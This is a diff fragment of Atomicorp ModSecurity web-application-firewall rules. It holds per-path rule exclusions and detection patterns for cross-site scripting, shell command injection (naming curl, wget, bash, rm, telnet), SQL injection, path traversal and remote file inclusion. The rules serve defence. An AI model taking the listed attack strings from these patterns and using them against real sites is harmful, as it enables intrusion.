+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/script/|!ARGS:piece2code|!ARGS:/^trucs/|!ARGS:/^lang\[/|!ARGS:/adwords/|!ARGS:metakey|!ARGS:tcode|!ARGS:thecode|!ARGS:/accolade/|!ARGS:/^vertex/|!ARGS:location|!ARGS:tz_media_code|!ARGS:slider|!ARGS:/format/|!ARGS:/confirmation/|!ARGS:answer|!ARGS:fieldstyle|!ARGS:/dialogue/|!ARGS:/performances/|!ARGS:values|!ARGS:media|!ARGS:/synopsis/|!ARGS:/button/|!ARGS:thirdparty|!ARGS:/question/|!ARGS:/premiere/|!ARGS:/disallow/|!ARGS:addr|!ARGS:/instrumentation/|!ARGS:fulladdress|!ARGS:msc.restrict|!ARGS:/profile/|!ARGS:/leftcol/|!ARGS:rs_specs|!ARGS:dloadexp|!ARGS:passwd|!ARGS:/rightcol/|!ARGS:title|!ARGS:/suffix/|!ARGS:php_out|!ARGS:/projects/|!ARGS:order_sign|!ARGS:/^button/|!ARGS:/remark/|!ARGS:/discography/|!ARGS:/^breves/|!ARGS:/custom/|!ARGS:/^zcck/|!ARGS:/limitpage/|!ARGS:/^tpl_/|!ARGS:/biog/|!ARGS:/^attr/|!ARGS:/custhead/|!ARGS:/custfoot/|!ARGS:/display/|!ARGS:/^arg/|!ARGS:/^ctl_next/|!ARGS:/print/|!ARGS:/quote/|!ARGS:/instructions/|!ARGS:deal_coupon|!ARGS:output|!ARGS:/^one/|!ARGS:ll|!ARGS:js|!ARGS:/^rsmailConfig/|!ARGS:/^extraf/|!ARGS:/send/|!ARGS:/^cb_/|!ARGS:/enquire/|!ARGS:/^dms/|!ARGS:/testimonial/|!ARGS:/accesoires/|!ARGS:tip|!ARGS:/feature/|!ARGS:/^cf/|!ARGS:/sherpa/|!ARGS:/review/|!ARGS:/server/|!ARGS:id|!ARGS:/term/|!ARGS:/thank/|!ARGS:/booking/|!ARGS:/msg/|!ARGS:/notice/|!ARGS:/email/|!ARGS:/caption/|!ARGS:ad_code|!ARGS:/pagecode/|!ARGS:/priceFormat/|!ARGS:/filter/|!ARGS:/^items/|!ARGS:/navigation/|!ARGS:/chronofield/|!ARGS:/script/|!ARGS:/specification/|!ARGS:/^code_/|!ARGS:/config/|!ARGS:/popup/|!ARGS:terms|!ARGS:parent_path|!ARGS:/^tips/|!ARGS:tag|!ARGS:/^form/|!ARGS:/^params/|!ARGS:/intro/|!ARGS:/info/|!ARGS:sidebar|!ARGS:code|!ARGS:/^option_value/|!ARGS:pay_inst_1|!ARGS:contact_info|!ARGS:thankyou|!ARGS:Right_photo_1|!ARGS:sml_prt_1|!ARGS:/layout/|!ARGS:thanksemail|!ARGS:/^jform/|!ARGS:/param/|!ARGS:/^xjxargs/|!ARGS:/^language_strings/|!ARGS:misc|!ARGS:layout|!ARGS:oid|!ARGS:prefix|!ARGS:/embedVideo/|!ARGS:value|!ARGS:default_value|!ARGS:/vendor_/|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/field_unit/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/duties/|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:/duties/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:parent_path|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:awards|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|\%env|< ?i?frame ?src ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import |asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|event|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=|shell\:|window\.location|asfunction:_root\.launch)"  "t:none,t:urlDecodeUni,t:replaceComments,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"
+
+SecMarker END_RULES_91347
+
+SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:91348,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340014,ctl:ruleRemovebyID=340193,ctl:ruleRemovebyID=390620,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380011,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=380012,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340151,ctl:ruleRemovebyID=340007"
+SecAction "phase:2,id:91349,t:none,pass,nolog,skipAfter:END_RULES_91349"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/onsubmitcode/|!ARGS:html|!ARGS:file|!ARGS:/^p_process_chat/|!ARGS:/template/|!ARGS:snippet|!ARGS:phpcode|!ARGS:intro|!ARGS:/title/|!ARGS:/^data_parent/|!ARGS:code|!ARGS:lajmi|!ARGS:newcontent|!ARGS:content|!ARGS:/desc/|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:/content/|!ARGS:/keyword/|!ARGS:/summary/|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/subject/|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/ "; ?(?:cat|ls|perl|uname|pwd|cp|kill|echo|tclsh8?|cpp|python|chown|rm|kill|ping|rsync|rdiff-backup|scp|(?:w|ftp)get|curl|links|g\+\+|ch(?:grp|own)|passwd|bash|telnet) " 	"phase:2,deny,log,auditlog,status:403,capture,id:343329,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhitespace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  command in REQUEST_URI or Argument',logdata:'%{TX.0}'"
+# Rule 340147: Generic XSS filter
+SecRule ARGS|ARGS_NAMES|!ARGS:/^cf/|!ARGS:/^OSDCS/|!ARGS:/^ARGS:booking_/|!ARGS:/^option_value/|!ARGS:/^one/|!ARGS:Right_photo_1|!ARGS:/term/|!ARGS:/^field/|!ARGS:/xargs/|!ARGS:/customcode/|!ARGS:/biography/|!ARGS:/review/|!ARGS:autogenerated|!ARGS:/^book/|!ARGS:/email/|!ARGS:/editor/|!ARGS:/listid/|!ARGS:/^_qf/|!ARGS:/select/|!ARGS:/filter/|!ARGS:/^tips/|!ARGS:/^items/|!ARGS:/navigation/|!ARGS:/chronofield/|!ARGS:/params/|!ARGS:tag|!ARGS:/^code_/|!ARGS:terms|!ARGS:/^form/|!ARGS:parent_path|!ARGS:/config/|!ARGS:/intro/|!ARGS:/info/|!ARGS:/^K2ExtraField/|!ARGS:/OSDCS/|!ARGS:info|!ARGS:server_validation|!ARGS:sidebar|!ARGS:pay_inst_1|!ARGS:/submitcode/|!ARGS:misc|!ARGS:/layout/|!ARGS:oid|!ARGS:layout|!ARGS:prefix|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"          "deny,log,auditlog,status:403,phase:2,t:none,t:removeNulls,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:310618,rev:92,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
+
+SecRule ARGS|!ARGS:task|!ARGS:q|!ARGS:submit2|!ARGS:/query/|!ARGS:/sql/ "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)" "deny,log,auditlog,status:403,phase:2,id:341544,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/administrator/index2.php)'"
+SecRule ARGS|!ARGS:task|!ARGS:submit2|!ARGS:/query/|!ARGS:/sql/ "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)" "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,deny,log,auditlog,status:403,phase:2,id:341545,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/administrator/index2.php)'"
+SecRule REQUEST_URI|ARGS|!ARGS:fcontent|!ARGS:videoplayer|!ARGS:/css/|!ARGS:/^wpm/|!ARGS:/message/|!ARGS:body|!ARGS:wysiwyg_input|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:message "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"deny,log,auditlog,status:403,phase:2,t:none,t:lowercase,id:340789,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"
+SecRule ARGS|!ARGS:/text/|!ARGS:fck_tw_body|!ARGS:/query/|!ARGS:/sql/|!ARGS:prefix|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:text|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:message|!ARGS:content "(?:(\w+)and(\w+)char\([0-9]+\)|(?:execute|convert)\(|(?:\;delete.*;(?:insert|declare|varchar)|(?:and .* \(select |(?:drop|create)(\w+)table|declare .* varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select |union all select |\b\W*?cast\b\W*?\(.* as |xecresultset|';declare\b\W*?|;set @)"                 "deny,log,auditlog,status:403,phase:2,multiMatch,id:341808,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhiteSpace,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)'"
+SecRule REQUEST_URI "!(/products/index\.php\?gallery=)" 	"deny,log,auditlog,status:403,phase:2,chain,t:none,t:lowercase,id:340794,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"
+SecRule REQUEST_URI|ARGS|!ARGS:/message/|!ARGS:body|!ARGS:/css/|!ARGS:/^wpm/|!ARGS:wysiwyg_input|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:message|!ARGS:videoplayer "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"
+
+SecRule REQUEST_URI|ARGS|!ARGS:fcontent|!ARGS:/message/|!ARGS:/css/|!ARGS:/^wpm/|!ARGS:body|!ARGS:wysiwyg_input|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:message|!ARGS:videoplayer "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"deny,log,auditlog,status:403,phase:2,t:none,t:lowercase,id:340796,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"
+
+
+
+SecMarker END_RULES_91349
+
+SecRule REQUEST_FILENAME "/req\.php" "phase:2,id:91350,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
+SecAction "phase:2,id:91351,t:none,pass,nolog,skipAfter:END_RULES_91351"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:str2 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340744,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:str2 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340750,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91351
+
+SecRule REQUEST_FILENAME "/cgi-bin/news/news\.cgi" "phase:2,id:91352,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
+SecAction "phase:2,id:91353,t:none,pass,nolog,skipAfter:END_RULES_91353"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:341746,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340752,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91353
+
+SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:91354,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91355,t:none,pass,nolog,skipAfter:END_RULES_91355"
+
+#SecRule ARGS|!ARGS:tz_feedburner_email|!ARGS:tz_feedburner|!ARGS:tz_selectedtab|!ARGS:/icon/|!ARGS:/logo/|!ARGS:/linkedin/|!ARGS:/youtube/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/link/|!ARGS:/theme/|!ARGS:/logo/|!ARGS:flickr|!ARGS:/banner/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/banner/|!ARGS:/image/|!ARGS:revchurch_video|!ARGS:/^YBN_/|!ARGS:bfa_ata_logo "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" #         "id:340753,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+#SecRule ARGS|!ARGS:tz_feedburner_email|!ARGS:tz_feedburner=|!ARGS:tz_selectedtab|!ARGS:/icon/|!ARGS:/logo/|!ARGS:/linkedin/|!ARGS:/youtube/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/link/|!ARGS:/theme/|!ARGS:/logo/|!ARGS:flickr|!ARGS:/banner/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/banner/|!ARGS:/image/|!ARGS:revchurch_video|!ARGS:/^YBN_/|!ARGS:bfa_ata_logo "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" # "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340754,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91355
+
+SecRule REQUEST_FILENAME "/edit-item\.php" "phase:2,id:91356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/removed\.php" "phase:2,id:91357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340084"
+
+SecRule REQUEST_FILENAME "/ezgctrlpanel\.php" "phase:2,id:91358,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91359,t:none,pass,nolog,skipAfter:END_RULES_91359"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:defaultprodpg|!ARGS:/redirect/|!ARGS:/link/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/pthanks/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:350746,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:defaultprodpg|!ARGS:/redirect/|!ARGS:/link/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/pthanks/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:350756,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "deny,log,auditlog,status:403,phase:2,!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91359
+
+SecRule REQUEST_FILENAME "/magazine/index\.php" "phase:2,id:91360,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91361,t:none,pass,nolog,skipAfter:END_RULES_91361"
+
+SecRule ARGS|!ARGS:/path/|!ARGS:/site/|!ARGS:return|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:q|!ARGS:/referer/|!ARGS:/refer/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:343745,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/path/|!ARGS:/site/|!ARGS:return|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:q|!ARGS:/referer/|!ARGS:/refer/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340758,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91361
+
+SecRule REQUEST_FILENAME "/fckeditor/editor/filemanager/browser/default/browser\.html" "phase:2,id:91362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/track\.php" "phase:2,id:91363,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91364,t:none,pass,nolog,skipAfter:END_RULES_91364"
+
